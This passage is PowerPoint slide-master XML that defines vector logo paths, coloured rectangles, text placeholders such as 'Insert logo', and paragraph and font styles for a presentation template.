                  <a:pt x="623544" y="30568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="623544" y="27025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="608787" y="27025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="604025" y="23212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="598125" y="20458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="591206" y="18787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="583387" y="18224"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="623544" y="62001"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="608787" y="62001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="608787" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="623544" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="623544" y="62001"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="623544" y="30568"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="601522" y="30568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="608787" y="34467"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="608787" y="54571"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="601522" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="623544" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="623544" y="30568"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="623544" y="863"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="608787" y="863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="608787" y="27025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="623544" y="27025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="623544" y="863"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="462800" y="18224"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="448589" y="19704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437446" y="24364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430173" y="32540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="427570" y="44564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430220" y="56531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="437500" y="64681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448407" y="69335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461937" y="70815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474841" y="69652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485132" y="66124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492524" y="60169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="493200" y="58813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452094" y="58813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444322" y="56134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="442683" y="48006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="497585" y="48006"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495815" y="38608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="443191" y="38608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="445528" y="31432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452615" y="29451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="491513" y="29451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487446" y="24437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="476395" y="19623"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462800" y="18224"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="496735" y="51727"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="482053" y="51727"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="478345" y="56908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="472122" y="58813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="493200" y="58813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="496735" y="51727"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="491513" y="29451"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="472046" y="29451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="479297" y="31432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="481787" y="38608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495815" y="38608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494870" y="33590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="491513" y="29451"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="368858" y="19088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="352463" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378193" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="399262" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404565" y="59499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388810" y="59499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="368858" y="19088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="425068" y="19088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="408673" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="388810" y="59499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404565" y="59499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="425068" y="19088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="343052" y="19088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="328282" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328282" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343052" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343052" y="19088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="343052" y="863"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="328282" y="863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328282" y="13728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343052" y="13728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="343052" y="863"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="293001" y="31432"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="278142" y="31432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278142" y="54673"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="279669" y="61926"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="284013" y="66949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="290819" y="69870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299732" y="70815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="306552" y="70815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312165" y="70383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317093" y="69507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317093" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294906" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293001" y="55956"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293001" y="31432"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="317093" y="57607"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="311124" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317093" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317093" y="57607"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="317093" y="19088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="264756" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="264756" y="31432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317093" y="31432"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317093" y="19088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="293001" y="4318"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="278142" y="8547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278142" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293001" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293001" y="4318"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="254495" y="19088"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="239725" y="19088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239725" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254495" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254495" y="19088"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="254495" y="863"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="239725" y="863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239725" y="13728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254495" y="13728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254495" y="863"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="173431" y="52070"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="158661" y="52070"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="161801" y="61846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170179" y="67529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182235" y="70168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196405" y="70815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="209756" y="70198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="220022" y="67767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226614" y="62649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227436" y="59588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179044" y="59588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173431" y="57518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173431" y="52070"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="194144" y="18224"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="181188" y="18835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170514" y="21142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="163189" y="25950"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160477" y="34023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="162540" y="41404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="168757" y="45778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179165" y="48098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="193801" y="49314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211683" y="50431"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214109" y="50685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="214109" y="58547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="211505" y="59588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227436" y="59588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195529" y="38430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178003" y="37134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175323" y="36614"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175323" y="30492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="179298" y="29451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="225691" y="29451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="224755" y="26245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217878" y="21229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207404" y="18835"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194144" y="18224"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="225691" y="29451"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="207022" y="29451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212382" y="30492"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212382" y="34721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="227228" y="34721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="225691" y="29451"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="114909" y="18224"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="100516" y="19704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89393" y="24364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82221" y="32540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79679" y="44564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82221" y="56531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89393" y="64681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100516" y="69335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114909" y="70815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129265" y="69335"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140392" y="64681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145884" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101180" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94437" y="55092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94437" y="33934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101180" y="30568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145850" y="30568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140392" y="24364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129265" y="19704"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114909" y="18224"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="145850" y="30568"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="128536" y="30568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135280" y="33934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135280" y="55092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128536" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145884" y="58458"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147585" y="56531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="150139" y="44564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147585" y="32540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145850" y="30568"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="47497" y="9512"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="9512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="69951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="53809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47497" y="53809"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56905" y="52248"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64215" y="47802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68952" y="40833"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="40754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15544" y="22542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68948" y="22542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64215" y="15552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56905" y="11084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47497" y="9512"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="1256665" h="92075">
                <a:moveTo>
                  <a:pt x="68948" y="22542"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="55092" y="22542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55092" y="40754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68967" y="40754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70637" y="31699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68948" y="22542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51A90F7-4173-4539-90AE-F4A8B177F34B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11684000" y="3657600"/>
            <a:ext cx="3657600" cy="4572000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3657600" h="4572000">
                <a:moveTo>
                  <a:pt x="3657600" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4572000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3657600" y="4572000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36576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EDC5B23-1647-49B1-8689-60FD3A78D068}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5283200" cy="9144000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5283200" h="9144000">
                <a:moveTo>
                  <a:pt x="5283200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9144000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5283200" y="9144000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528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78D6D7-A21E-4916-A1DB-9ADACBC53B10}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10769600" y="1828799"/>
            <a:ext cx="2743200" cy="6400800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2743200" h="6400800">
                <a:moveTo>
                  <a:pt x="914400" y="5486400"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="5486400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6400800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914400" y="6400800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914400" y="5486400"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2743200" h="6400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2743200" h="6400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CF9F1995-3828-492B-8E00-DABB95B1CE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7315199"/>
            <a:ext cx="2540000" cy="914399"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="1600"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR"/>
              <a:t>Insert logo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D4C3-7FF7-4C2C-AC1C-58D153EBB7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372230"/>
            <a:ext cx="3449954" cy="2819400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/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C0C3C-8E8C-4602-B27C-EAA9C3EB84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5566" y="1372230"/>
            <a:ext cx="4112260" cy="28194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4525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" y="4114800"/>
            <a:ext cx="1625600" cy="162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4500" y="4438542"/>
            <a:ext cx="4000499" cy="990903"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" tIns="75600">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="14400">
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="14400">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1500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459"/>
              </a:spcBef>
              <a:defRPr sz="1300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1828800"/>
            <a:ext cx="1625600" cy="162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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6858000"/>
            <a:ext cx="16256000" cy="22860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 userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12833403" y="7870446"/>
            <a:ext cx="353060" cy="353060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 userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13370664" y="7870446"/>
            <a:ext cx="353060" cy="353060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 userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14982452" y="7870446"/>
            <a:ext cx="353060" cy="353060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 userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="14445191" y="7870446"/>
            <a:ext cx="353060" cy="353060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 userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="13907928" y="7870446"/>
            <a:ext cx="353060" cy="353060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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12833403" y="7316466"/>
            <a:ext cx="252153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2200" b="1" err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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2200" b="1" err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2200">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Poppins ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Graphique 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD8DA84-E25B-4397-9A13-BE58B213B7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4400" y="7404404"/>
            <a:ext cx="3657600" cy="867290"/>
            <a:chOff x="6756400" y="5334000"/>
            <a:chExt cx="1824936" cy="4327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7AB141-7BCF-40C0-B8C8-1BE3AA1B10F4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7041667" y="567528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que 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A2F515-8375-4C33-99AF-323CF12CD29D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6756400" y="5334000"/>
              <a:ext cx="1824936" cy="273031"/>
              <a:chOff x="6756400" y="5334000"/>
              <a:chExt cx="1824936" cy="27303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F09EFB-CB0B-4FBD-B3D9-8948AB4B0676}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6756400" y="533400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7CE0B4-A958-4D06-9420-19E32A7A994A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8363039" y="538422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4500" y="2152542"/>
            <a:ext cx="4000499" cy="990903"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" tIns="75600">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="14400">
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="14400">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1500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459"/>
              </a:spcBef>
              <a:defRPr sz="1300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5200" y="4114800"/>
            <a:ext cx="1625600" cy="162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55300" y="4438542"/>
            <a:ext cx="4000499" cy="990903"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" tIns="75600">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="14400">
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="14400">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1500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459"/>
              </a:spcBef>
              <a:defRPr sz="1300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85200" y="1828800"/>
            <a:ext cx="1625600" cy="162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55300" y="2152542"/>
            <a:ext cx="4000499" cy="990903"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" tIns="75600">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="14400">
              <a:defRPr/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="14400">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:defRPr sz="1500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459"/>
              </a:spcBef>
              <a:defRPr sz="1300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411583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913785" y="7403482"/>
            <a:ext cx="355969" cy="355969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1451201" y="7403482"/>
            <a:ext cx="355969" cy="355969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4951076"/>
            <a:ext cx="3657600" cy="862884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11684000" y="6400800"/>
            <a:ext cx="4572000" cy="27432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9855327" y="7315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12598400" y="36575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13512800" y="0"/>
            <a:ext cx="1828800" cy="27432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89408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6184900" y="5194300"/>
            <a:ext cx="22479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err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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2200" b="1" err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220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901700" y="6388097"/>
            <a:ext cx="8140700" cy="884216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3335" marR="5080" indent="-1270" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="175"/>
              </a:spcBef>
            </a:pP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1400" spc="1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1400" spc="3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140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988617" y="7403481"/>
            <a:ext cx="355969" cy="355969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2526033" y="7403481"/>
            <a:ext cx="355969" cy="355969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3063450" y="7403481"/>
            <a:ext cx="355969" cy="355969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95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913785" y="7403482"/>
            <a:ext cx="355969" cy="355969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1451201" y="7403482"/>
            <a:ext cx="355969" cy="355969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4951076"/>
            <a:ext cx="3657597" cy="862884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11684000" y="6400800"/>
            <a:ext cx="4572000" cy="27432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9855327" y="7315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12598400" y="36575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13512800" y="0"/>
            <a:ext cx="1828800" cy="27432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89408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6184900" y="5194300"/>
            <a:ext cx="22479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err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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" b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.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="2200" b="1" err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220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901700" y="6388097"/>
            <a:ext cx="8140700" cy="884216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3335" marR="5080" indent="-1270" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
